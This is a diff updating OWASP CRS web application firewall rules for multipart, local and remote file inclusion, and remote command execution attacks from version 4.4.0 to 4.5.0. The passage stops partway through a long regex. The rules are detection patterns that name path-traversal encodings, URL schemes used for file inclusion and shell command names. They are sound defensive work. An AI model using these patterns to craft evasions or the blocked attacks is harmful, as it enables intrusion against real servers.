b64f801..b55a83b 100644 --- a/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf +++ b/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -21,7 +21,7 @@ SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.922100_charset=|%{ARGS._charset_}|',\ chain" @@ -43,7 +43,7 @@ SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/272/220',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule TX:1 "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*(?:[\s\x0b]*,[\s\x0b]*(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*)*$" \ @@ -63,6 +63,6 @@ SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/272/220',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf index 14f3344..acc539a 100644 --- a/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf +++ b/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?i)(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[56]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))(?:\.(?:%0[01]|\?)?|\?\.?|%(?:2(?:(?:5(?:2|c0%25a))?e|%45)|c0(?:\.|%[256aef]e)|u(?:(?:ff0|002)e|2024)|%32(?:%(?:%6|4)5|E)|(?:e|f(?:(?:8|c%80)%8)?0%8)0%80%ae)|0x2e){2,3}(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[56]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))" \ "id:930100,\ phase:2,\ @@ -24,7 +24,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML: tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" @@ -43,7 +43,7 @@ SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* " tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ @@ -64,7 +64,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ tag:'PCI/6.5.4',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -84,12 +84,12 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ tag:'PCI/6.5.4',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-files.data" \ "id:930121,\ phase:1,\ @@ -106,12 +106,12 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-f tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ tag:'PCI/6.5.4',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI" diff --git a/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf index 3c16760..8d4c864 100644 --- a/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf +++ b/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ "id:931100,\ phase:2,\ @@ -24,7 +24,7 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3 tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -43,7 +43,7 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -62,12 +62,12 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ "id:931130,\ phase:2,\ @@ -83,7 +83,7 @@ SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|it tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ chain" @@ -105,15 +105,15 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ chain" SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI" diff --git a/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf index b0ed972..54ecf3c 100644 --- a/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf +++ b/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,9 +7,9 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*